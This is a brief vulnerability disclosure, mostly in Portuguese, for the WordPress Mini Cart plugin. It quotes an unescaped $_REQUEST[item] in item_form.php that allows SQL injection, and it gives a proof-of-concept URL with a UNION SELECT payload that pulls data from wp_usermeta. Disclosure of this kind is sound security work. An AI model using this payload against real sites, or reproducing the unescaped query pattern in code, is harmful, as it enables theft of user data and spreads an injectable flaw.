Homepage:
https://wordpress.org/plugins/mini-cart/
Descrição:
$_REQUEST[item] is not escaped. Url is accessible for user collaborator above.
Url vulnerável : http://localhost:1406/wp/wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=0
Arquivo / Código:
… /wp-content/plugins/mini-cart/item_form.php
line: 28
$item = array();
if($action == 'edit') {
$item = $wpdb->get_row("SELECT * FROM {$wpdb->prefix}minicart_item WHERE ID = $_REQUEST[item]");
}
?>
Prova de Conceito:
Logged with user collaborator :
Url com exploit: http://target/wp-admin/edit.php?page=mini-cart%2Fitem_form.php&item=0+UNION+SELECT+1%2C2%2C3%2C4%2C5%2Cmeta_value%2C7%2C8%2C9%2C10+from+wp_usermeta+where+umeta_id%3D46&action=edit
Linha do tempo:
- 10/11/2016 – Discovered